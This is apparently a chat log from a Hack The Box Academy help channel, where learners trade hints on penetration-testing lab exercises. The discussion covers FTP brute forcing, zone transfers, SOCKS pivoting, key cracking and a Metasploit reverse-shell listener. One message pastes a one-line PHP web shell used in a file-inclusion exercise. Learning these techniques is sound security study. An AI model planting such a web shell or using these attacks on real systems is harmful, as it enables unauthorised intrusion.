I think there is something funky going on with the boxes that are spawning. The flags that I am finding are referecning an SMB attack, not FTP. Ill try restarting the target a copule times. Not sure if anyone else has seen this.

#

no dice, i guess ill just wait for HTB to reach out

fathom pendant
#

What module?

rotund urchin
#

Its the attacking common services module, attacking FTP.

fathom pendant
#

And what happens when you ls?

rotund urchin
#

in FTP?

fathom pendant
#

Yes

rotund urchin
#

Once i found the user for FTP I logged in and there is a flag.

fathom pendant
rotund urchin
#

Funny enough, its the same flag as when you SSH into the box (as the last question says)

#

but the 2nd question wont accept what user I am using FTP as, and it wont accept the flag.

#

But, when I movve onto the next session (attacking SMB), it accepts all my answers lol

#

something buggy

#

the platform is acting like its spawning the smb attacks box, not the FTP one

rotund urchin
#

No. I spawn the box on the FTP module and I get a hit on FTP as J****.

#

So its acting like its not spawning the right box

#

cause J**** is for the SMB attacking module

fathom pendant
#

It uses the same box

#

For all sections

rotund urchin
#

ah that would make sense lol

#

ill try it again then

fathom pendant
#

Don't forget to utilize the resources

#

Took roughly 2-3 minutes and hydra spat out the right answer for me

rotund urchin
#

I am, and its only spitting out one user/password and its the J**** one. I figured out the username from what you mentioned, so I am only brute forcing with that to see if I can get the pw

fathom pendant
#

Note I used default threading

#

Are you attacking the right port as well? (-s option)

fathom pendant
rotund urchin
#

This is where I am getting confused. I am using the users.list and pw.list from Resources and I am attacking port ||2121||. The ONLY hit i get is J*.. I am trying again with Hydra and using R* as a username. We shall see.

fathom pendant
#

Can you DM me your screenshots as I'm now curious

rotund urchin
#

Yes, i appreciate it

velvet atlas
#

alright. I have been beating my head for days. AD skills assessment II. questions 10- get the flag from DC01 admin desktop. Have seen a few other people ask with replies of you dont need to login to DC01. and check the perms of the last user you got. which is C****. Tried running through numerous enumerations in the AD and win priv modules. Gone in lots of circles. nothing.

wraith delta
#

Guys what modules should I do to be able to pwn atleast the easy boxes

foggy light
#

you can check academy x hackthebox

wraith delta
#

Yeah ive done the following, Intro to networking, Metasploit framework, Web reqeusts, attacking web apps with ffuf, network enum with nmap

#

ive done these fully

balmy radish
#

Completing the CBBH track

wraith delta
#

Whats that

foggy light
#

use htb x htb labs

wraith delta
#

can u send link

#

nbm got it

foggy light
wraith delta
#

Got it thanks a lot man

velvet atlas
fathom pendant
#

it should be in there it has been a minute and my notes are lacking on this one

velvet atlas
#

oh you mean once you are on DC01 I assume. I cant get on lol

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

like i said it's been a hot minute and i'm currently revamping notes for older sections to bring them up to par

velvet atlas
#

yea fair enough

wraith delta
#

I am using HTB X Htb labs and on some of the machines its showing i only need to do 1 module to pwn a hard machine ????

misty current
wraith delta
#

I thought we meant to get a shell on the machines??

#

I am so confused

#

The flag?

misty current
#

Getting the shell/rce/flag is the ultimate goal, yes.

wraith delta
#

Yes so isnt that what we meant to do, doesnt htb labs x htb show which modules u should know to pwn the machine?

fathom pendant
#

it gives you an idea of what would be useful to know

wraith delta
#

Why for soccer it shows only the nmap module

#

u need to know way more than that

misty current
#

If you're looking for that perspective then, in the htb labs x academy, you would need to search based on machines, instead of modules.

wraith delta
#

Thats whgat im doing]

fathom pendant
#

yeah soccer only shows nmap

wraith delta
#

I need to know way more than that

fathom pendant
#

but that's also probably because soccer isn't that difficult in terms of what you should be doing

#

most likely a bit of exploring a webpage

#

ยฏ_(ใƒ„)_/ยฏ

wraith delta
#

I checked a walkthrough they be doing so much stuff irrelevnt to nmap

#

i mean like the module

balmy radish
#

Going through the cpts path will give you the skills needed for easy and medium boxes

wraith delta
#

I cant find that path]

fathom pendant
#

it's a job role path

wraith delta
#

still doesnt show

misty current
#

CPTS path = penetration tester

wraith delta
#

Bruh

wraith delta
balmy radish
#

The boxes on htb are tough

wraith delta
#

Fucking hell alright

fathom pendant
#

that might be feedback for the academy x htb then ยฏ_(ใƒ„)_/ยฏ

#

but most of this is basic aside from maybe sqlmap

wraith delta
#

Instead of it helping me it made me more confused

misty current
#

It's just a light guide. Don't depend on it completely.

fathom pendant
#

but this also isn't the right place to complain about #boxes

#

ยฏ_(ใƒ„)_/ยฏ

wraith delta
#

My initial question was about the modules

fathom pendant
#

it's still a box related question at the core

wraith delta
#

This is what i was talking about

fathom pendant
#

it's possible it wasn't update properly when it retired

#

the relations aren't a bible to go by

#

also just because the modules are easy, it's more the implementation that can make a box more difficult

wraith delta
#

Ok well those modules are defintely not the ones to learn for 'Brain Fuck"

#

machine

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

always pika_sip

quick cloud
#

Saying the modules are easy made me die inside haha

fathom pendant
quick cloud
#

ohh

fathom pendant
#

for the most part if you pay enough attention and take good notes they can be very easy

#

it just comes down to skill issue

quick cloud
#

Thats good to hear haha I spent 5 hours today making notes better and getting a better understanding of some modules I completed already

fathom pendant
#

Yep I still need to reup notes from File Transfers on

#

So

#

a fair bit to go

#

i'm also adding notes for the labs for those

#

not just the skill assess

quick cloud
#

Yes me also it takes alot more time but it feels worth it

#

Trying to do report style notes for each lab I do

#

with screenshots and POC's

boreal basalt
boreal basalt
#

Module = File Inclusion
Section = LFI and File Uploads

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

this is work but why the next command don't :

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.txt shell.php

#

zip warning: missing end signature--probably not a zip file (did you
zip warning: remember to use binary mode when you transferred it?)
zip warning: (if you are trying to read a damaged archive try -F)

foggy light
boreal basalt
#

nop ziping shell.php to shell.txt
the command is different to mv 1 2 | zip 2 1

#

the final file is shell.txt

fathom pendant
#

the basic command format is;
zip options archive inpath inpath

boreal basalt
#

yep the file parent is in first then the file who put under

boreal basalt
fathom pendant
#

just there

#

as a thing

boreal basalt
#

okk

stone jacinth
#

@boreal basalt it is working in my case

#

echo '<?php something ?>' > shell.php && zip shell.txt shell.php

boreal basalt
#

nop

#

not working | type file shell.jpg then file shell.txt

#

shell.txt isn't a zip file

stone jacinth
#

is this your command?

fathom pendant
dim hemlock
#

Any idea why i get this error?
[-] SMB2_CREATE: /home/ltnbob/Documents/.,65,[Errno 2] No such file or directory: '/home/ltnbob/Documents/.'

fathom pendant
#

well; it would seem that directory does not exist

dim hemlock
#

Haha yea but im unable to create that direactory on the HTB Parrot

heady tusk
fathom pendant
#

pika_sip what is the command you ran?

dim hemlock
#

C:>move same.save \10.10.15.212\home\htb-ac-534765\Documents
The system cannot find the file specified.

I did try that too actually

heady tusk
#

how'd you setup the smb share?

fathom pendant
#

wrap your command in doubleticks

dim hemlock
#

Ohh now I know the problem

#

hehe

fathom pendant
#

test

dim hemlock
#

Its how I created the share

#

Sorry long day

#

haha

fathom pendant
#

wrong sharename?

dim hemlock
#

Yeaa

heady tusk
boreal basalt
fathom pendant
boreal basalt
#

and i can't send scrennshots wtf

fathom pendant
#

.jpg shows as purple

boreal basalt
#

ah

#

thks

fathom pendant
boreal basalt
#

thks

outer steeple
#

Under the Password Attacks module: Examine the target and find out the password of the user Will. Then, submit the password as the answer. The hint of ||Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.|| Are we supposed to use a mutated version of the list? I used cme to try and access any smb shares, which still no access after getting the password there. Unable to ssh as ||kira|| but was able to ssh into the machine as ||sam from an earlier module||. Do I need to do further enumeration as ||sam||?

heady tusk
#

which section is that?

outer steeple
#

Password attacks > Linux Local Password Attacks > Credential Hunting in Linux

misty current
#

You're thinking on the right path.

outer steeple
#

Awesome. I grep'd out the parts of the hint into a new list, so heres to hoping I'll get a quick hit

misty current
#

You don't need to go that far...

#

They've given you the most important single word information. That's all you need to start working on.

vital zephyr
#

hi everyone

how i can Submit the number of all "A" records from all zones as the answer??
i'm stopped on the last question about
Information Gathering - Web Edition

Page 7
Active Subdomain Enumeration

Active Subdomain Enumeration

#

can anyone give me some suggestions?

heady tusk
#

well zone transfer everything you can, then count them

misty current
vital zephyr
#

there are 22, but the answer is wrong

fathom pendant
#

because the answer isn't 22

#

:)

vital zephyr
#

maybe I didn't understand the question that the site asks me, but do you want the number of transfers? like N , or something else?

#

CAN SOMEONE TELL ME WHAT YOU WANT? I AM NOT REALLY UNDERSTANDING WHAT TO LOOK FOR

#

WHAT HTB WANT*

misty current
#

You haven't zone transferred everything

fathom pendant
#

^

#

and more importantly - your math is wrong :)

vital zephyr
#

i dont understand ahah

#

pleeeeease heeelp meeee

#

i wanna understand

#

porca madonnazza

vital zephyr
fathom pendant
#

well

#

i mean you're not good at counting

heady tusk
#

Can only reiterate. Go through everything you found, zone transfer it if possible, then count

vital zephyr
#

kali

fathom pendant
#

grep -v "SOA\|TXT" | wc -l

#

that may help you with your zone transfer command

blazing crypt
#

For the attacking Thick clients modules, I cannot get the SQL injection working with the Fatty client.

I've tried everything, even what's exactly shown to work in the module. Am I doing something wrong?

vital zephyr
#

first of all, is the command i gave correct?

#

dig @10.129.190.227 NS axfr inlanefreight.htb

fathom pendant
#

don't need NS

#

dig axfr inlanefreight.htb @<ip>

acoustic owl
fathom pendant
#

then you need to dig the other zone you have

vital zephyr
#

so I have to count the zones not only given to me by this command, but also those that I obtained from other commands?

#

altogether

thorn urchin
#

I mean does the question ask how many subdomains from a single zone or does it ask how many subdomains total

#

specifics matter

acoustic owl
#

it ask how many a records

fathom pendant
#

"All 'A' records from ALL zones"

vital zephyr
#

in other words what is the command to see all A records of all zones?

#

I'm crashing behind this question

acoustic owl
#

First of all, do a zonetransfer

heady tusk
vital zephyr
#

now i have launch this: dig axfr inlanefreight.htb @10.129.113.149

#

lauched*

neat trench
#

I am using powershell revshell and there is no error output of my commands, maybe someone can help me upgrade it to see errors for debuging next steps (Active Directory Enumeration & Attacks
AD Enumeration & Attacks - Skills Assessment Part I)

rustic sage
neat trench
velvet atlas
#

im still stuck on how to get on DC01 in the AD skills 2 haha

rustic sage
#

Busy with skill assesment on Windows command line. Can SSH with the first set of credentials but not with the second pair.

heady tusk
zinc marsh
#

Module: Pivoting, tunneling and port forwarding. Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling Q: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

#

why im getting that all the hosts are up when i carry out the nmap scan?

#

this is my scan: proxychains nmap -sn -v 172.16.5.1-200 -T4

misty current
#

because when you're port forwarding you needa do -sT with nmap

fathom pendant
#

Introduction to Windows Command Line

rustic sage
fathom pendant
#

user2 is user1 flag, user3 is user2 flag, user4...

#

so on and so on

rustic sage
#

Silly me, thanks!

misty current
#

Doing a full TCP connect scan allows the full connection to be established, so it provides more accurate results.

zinc marsh
#

k ty

#

i did it with sT but there are 50 hosts up

#

is that right?

misty current
#

just to add, ICMP don't work when proxying. (in most cases)

acoustic owl
#
misty current
zinc marsh
misty current
#

can you share the command you used now

zinc marsh
#

proxychains nmap -sT -v 172.16.5.0/24 -T4

#

proxychains nmap -sT -Pn -v 172.16.5.0/24 -T4

misty current
#

-Pn marks everything as up.

zinc marsh
#

proxychains nmap -sT -p 3389 172.16.5.0/24 -T4

#

these are all i did

#

they show me from 172.16.5.192-256 open

#
        inet 10.129.130.101  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:feb9:1c4  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:1c4  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:01:c4  txqueuelen 1000  (Ethernet)
        RX packets 67135  bytes 4063107 (4.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 66719  bytes 3628971 (3.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.5.129  netmask 255.255.254.0  broadcast 172.16.5.255
        inet6 fe80::250:56ff:feb9:caf4  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:ca:f4  txqueuelen 1000  (Ethernet)
        RX packets 66  bytes 5747 (5.7 KB)
        RX errors 0  dropped 12  overruns 0  frame 0
        TX packets 51  bytes 3568 (3.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 582  bytes 45942 (45.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 582  bytes 45942 (45.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0```
#

these are the INCs open

#

so i can only try to pivot in 172.16.5.129

misty current
#

proxychains nmap -sT --top-ports=20 --open 172.16.5.0/23 do this

acoustic owl
#

If you are on the pivot host, do a ping sweep from there and then use nmap to scan the machines specifically.

misty current
#

ping sweep from the pivot machine is what I did for the module too.

fathom pendant
#

doesn't nmap also have just the -sn command as a sweep

#

instead of needing to specify subnet mask

thorn urchin
#

yes but it doesnt work through proxychains

misty current
fathom pendant
#

AHHHH

#

ok

zinc marsh
#

Windows Defender block ICMP requests

fathom pendant
#

rude

#

:(

misty current
#

Not the reason why ICMP pings don't work here in this case.
By defaults pinging is disabled on client windows machine (not the servers mostly).

zinc marsh
#

that was what the module told

#

We also need to make sure we are aware of the fact that host-alive checks may not work against Windows targets because the Windows Defender firewall blocks ICMP requests (traditional pings) by default.

#

Am stupid lol

misty current
#

as long as you get it ๐Ÿ™‚

zinc marsh
#

A full TCP connect scan without ping on an entire network range will take a long time. So, for this module, we will primarily focus on scanning individual hosts, or smaller ranges of hosts we know are alive, which in this case will be a Windows host at 172.16.5.19.

#

-.-

fathom pendant
#

this is why reading is important

#

apparently not as important as my ability to type

vapid isle
#

hey, all I have a question about which I am stuck :

During an investigation, we discovered a malicious file with an MD5 hash value of 'b40f6b2c167239519fcfb2028ab2524a'. How do we usually call such a hash value in investigations? Answer format: Abbreviation

autumn pilot
#

from which section and module is that

vapid isle
#

it's from INCIDENT HANDLING PROCESS

vapid isle
#

I did

#

but sill i didn't get it

zinc marsh
#

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
lport => 8000
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000```
This is the same than doing nc -nlvp 8000 -s 0.0.0.0
Right?
cosmic helm
#

yeah conceptually, i think

fathom pendant
#

yeah, basically

heady tusk
#

I never tried combining a https reverse shell with nc. I'd assume that breaks though. Never actually read what multi/handler does, but probably does some extra stuff

misty current
#

nc don't handle meterpreter shells.

fathom pendant
#

^

#

it's one of those it can handle shells, just not meterpreter

#

conceptually though it's fairly similar

#

also you shouldn't need to specify -s 0.0.0.0 for nc

acoustic owl
fathom pendant
#

as by default nc -lvnp listens on 0.0.0.0 (all interfaces)

misty current
fathom pendant
#

^

#

Also since you went back that far... I Literally answered them on how to do it

#

just under that post you replied to

#

answer is two things; have inlanefreight.htb in your /etc/hosts file, and only needing inlanefreight.htb in the resolvers.txt for subbrute

foggy light
#

damn... I just saw a flash.. xD

#

someone posted some kind of invite link and got banned in nano second

fathom pendant
#

that means the bot is working :D

foggy light
#

never saw this crazy agressive bot.. great job whoever made it

rustic sage
#

Hi, I get the same conclusion, It look like I vn't find any share browsed by sccm to trigger a SMB - NTLM authent to my target host? I tried to track SCCM user activity (logged on console) without any success. Any hint?

#

Hi, Stuck at the same point any hint? Unable to find a usefull share for that. Any hint?

zinc marsh
#

i have one question about ping sweep

#

arent the packets that i send doing ping sweep ICMP as well?

misty current
#

Yes

fathom pendant
#

windows > windows internal is not going to be blocked

zinc marsh
#

then why if i do ping sweep inside the target ICMP are not blocked

fathom pendant
#

because trusted machine architecture :P windows can inherently trust systems on the same network

#

"allow other devices to access this system"

zinc marsh
misty current
#

The URL/SCF File attack

prime nova
#

can i get some help here? im on HTB academy, linux fundamentals and navigation, and this question is showing up: What is the index number of the "sudoers" file in the "/etc" directory? but when i type the index number 146948 says the answer is incorrect

fathom pendant
prime nova
#

thank you

fathom pendant
#

note you can also do ls -li /etc/ to list files and their inodes

prime nova
#

i found it already and got through the question, im learning so its a bit confusing, appreciate the help tyhappyCat

fathom pendant
#

nah you're good

#

just remember usually when they talk about a file they mean the literal file not any additional extensions

outer steeple
#

Can somebody give me a sanity check on the Passwd, Shadow & Opasswd question in the Password Attacks section.|| I've tried the rockyou.txt, fasttrack.txt, password.list, and mutated password list on the unshadowed file, and none of them work.||

balmy saffron
#

Hello,
I am in the protected files section (password attacks) and I must decrypt kira's ssh private key.
I downloaded it on the pawnbox, and tried
[us-academy-1]โ”€[10.10.14.167]โ”€[htb-ac-746322@htb-uyt3pudr5b]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ ls
Desktop id_rsa Templates
โ”Œโ”€[us-academy-1]โ”€[10.10.14.167]โ”€[htb-ac-746322@htb-uyt3pudr5b]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ ssh2john.py id_rsa > hashkey
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

Is this normal? What am I doing wrong?

outer steeple
balmy saffron
misty current
#

This problem is prolly because something went wrong with the copy pasting I guess.

outer steeple
#

Not sure if it would matter either, but did you try calling python as well in the command?

balmy saffron
outer steeple
#

89750ba905425d94c88e19eb59bc785a

#

thats the md5 sum I have on my copy of that id_rsa

#

if you want to compare

balmy saffron
#

โ”Œโ”€[us-academy-1]โ”€[10.10.14.167]โ”€[htb-ac-746322@htb-uyt3pudr5b]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ python /usr/share/john/ssh2john.py id_rsa > hashkey
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

misty current
#

oh wait, is it a python modular error? hmmm

balmy saffron
#

md5sum id_rsa
89750ba905425d94c88e19eb59bc785a id_rsa

misty current
outer steeple
#

Let me load up pwnbox real fast and see if I have the same issue there

#

I tried mine on my kali host

balmy saffron
#

interesting

#

Python 3.9.2

#

python2 does not work

outer steeple
#

you need to install it on your pwnbox

balmy saffron
#

ok I see

eager hatch
# balmy saffron Python 3.9.2

It's totally removed in Python3.9 indeed. Same output with python2?
EDIT: ah ok you just don't have it installed ^^

outer steeple
#

apt install python2

#

and call python2 and it works

balmy saffron
#

ok thanks guys you are awesome

#

it indeed worked.

fathom pendant
eager hatch
# fathom pendant It's not totally removed just syntax changed

decodestring is totally removed, it was an alias for decodebytes so the functionality is indeed still here.
From the 3.9 changelog:
"base64.encodestring() and base64.decodestring(), aliases deprecated since Python 3.1, have been removed: use base64.encodebytes() and base64.decodebytes() instead. (Contributed by Victor Stinner in bpo-39351.)"

fossil crescent
#

Anyone avail to dm re NoSQLi Skill Assessment II? At a loss

rotund urchin
#

Can someone provide me a nudge on the Attacking Common Services - Easy Lab? I found a username and tried brute forcing all services with the provided pw list, but I am not getting a hit on a password. No clue where to go.

pastel galleon
#

hi i'm stuck on " Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file." in Introduction to Windows Command Line, I have tried where /R C:\ waldo.txt, but I get some " A positional parameter cannot be found that accepts argument 'waldo.txt'." type of error

quasi wave
#

I just started CPTS path

#

Itโ€™s going good

#

Finally finished InfoSec Foundations

#

HTB is great

foggy light
gentle root
#

For this regarding SPNs in kerberoasting -- I would still write up the finding, but I would drop it down to a medium-risk issue to make the client aware of the risk of SPNs in the domain -- Is there a way to mitigate kerberoasting ? Like isn't this always something they could find?

foggy light
#

Depends on user access and password policy

thorn urchin
#

Honestly its a good question and im not sure. I think its just a part of how AD works.

fathom pendant
#

@obsidian yacht you're not gonna be able to post screenshots, #welcome #rules

obsidian yacht
#

Lovely!

fathom pendant
#

Once you've verified your main HTB account you can post images

#

It's anti-spam measure

obsidian yacht
#

Ive tried, whenever I go to login it tells me my credentials are invalid. Then I reset them and dont get in email. So I reset it manually, and it works on the website but not the discord extension. shit just breaks for me

#

ill just figure it out, not worth the stress

fathom pendant
#

Because app.hackthebox and academy.hackthebox are separate logins

next ledge
#

What resource should we use to brute this password?

fathom pendant
hidden trellis
#

can anyone give me a nudge for Blind SQL Injection final skills assessment?

next ledge
#

I am wondering what tool would be used to brute the user pass files to get the correct answer.

fathom pendant
#

Is that the smb question?

#

crackmap works fine

#

But it's a case of needing a valid user first

next ledge
#

I will try a newer version .

fathom pendant
#

Otherwise you can get false positives

next ledge
#

I was able to narrow down valid accounts using cme. When I added them to a file, then used a password list i got false negatives.

#

using cme with the valid user/pass I still get a negative.

lean prairie
#

I have the same issue, I was looking for some way to set the currency to GBP. But I think I will contact support

obsidian sundial
#

hello i need help with hash cat on windows

fathom pendant
#

Or --local-auth

next ledge
#

Hey the --local-auth worked.

#

Thanks alot. I assumed the \accountname was local but it looks different with machinename\accountname for sure.

fathom pendant
#

I think hydra uses single, cme uses double -

red current
#

Is anyone available to give a hint or clue on how to get the flag in the Bypassing Other Blacklisted Characters in the Command Injections module?

misty mural
#

Hello. ๐Ÿ‘‹๐Ÿป

Iโ€™m working through the Public Exploits page of the Getting Started module.

Iโ€™m new to Metasploit and am not sure what to set the TARGETURI to for the exploit I chose.

fathom pendant
#

Google what a URI is

misty mural
#

Using the format http://IP:PORT/index.php, the Target URI is asking for the full address or index.php?

fathom pendant
#

Yes

#

The full address

tidal mango
#

In the Active Directory PowerView module Page 7 ** Enumerating Group Policy Objects (GPOs)**. The question is **Find the GUID of the Audit Policy GPO. ** I could not get Get-GPO to run on the windows box at all. And after trying all kinds of commands I could not find the GUID or figure how to at least, in Powershell at all. I did find it with other methods, I was wondering if anyone has insight in how to do this in PowerShell since the Get-GPO will not run on the box? Thanks!

fathom pendant
#

If it's part of power view you may need to first import power view. You can see if the required .ps1 modules are in C:\tools

tidal mango
#

I did that many times and used powerview throughout the rest of that module. and yes it is in c:\tools ๐Ÿ™‚

tidal mango
fathom pendant
#

It's probably a syntax you're overlooking. I haven't done that module myself

tidal mango
heady geyser
#

having trouble with attacking services/attacking ftp section. question is asking "which port is ftp running on". I feel so dumb, ive done all kinds of nmap scans including UDP scans, but nothing shows ftp. should i use the attackbox instead of the vpn?

solemn vector
#

you run nmap with -p- ?

heady geyser
#

i did

tidal mango
heady geyser
#

nope. ports came out as 22,53,139,445. Just to do a sanity check i actually inserted those 4 ports as my answer for the question and all 4 of those were incorrect